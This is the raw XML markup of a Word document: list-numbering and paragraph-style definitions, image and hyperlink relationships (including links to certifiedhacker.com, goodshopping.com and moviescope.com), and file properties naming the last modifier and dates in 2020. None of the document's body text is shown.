      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4845" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="595229AA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5768" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CC765458">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6691" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="333A8C7C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7614" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D414BEDE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8537" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D0307F28">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9460" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="3"/>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F84"/>
    <w:rsid w:val="007D4EEB"/>
    <w:rsid w:val="00D02F84"/>
    <w:rsid w:val="00D42908"/>
    <w:rsid w:val="00F83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A48580"/>
  <w15:docId w15:val="{F76B71DB-D450-4A1E-AC75-612C3E742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28"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="2280" w:hanging="360"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>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Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="20"/>
      <w:ind w:left="2315" w:right="2910"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Carlito" w:eastAsia="Carlito" w:hAnsi="Carlito" w:cs="Carlito"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1560" w:hanging="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="118"/>
      <w:ind w:left="457" w:right="448"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:u w:val="single" w:color="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8.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.certifiedhacker.com/"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7.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.goodshopping.com/"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www.moviescope.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6.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.goodshopping.com/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.moviescope.com/"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28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.moviescope.com/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.goodshopping.com/" TargetMode="External"/><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hyperlink" Target="http://www.goodshopping.co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eader" Target="header1.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.goodshopping.com/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.goodshopping.com/"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13</Pages>
  <Words>2169</Words>
  <Characters>12364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Elliot Barnett (1801749)</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-03T09:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-03T09:06:00Z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2020-11-26T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Creator">
    <vt:lpwstr>Acrobat PDFMaker 18 for Word</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2020-12-03T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>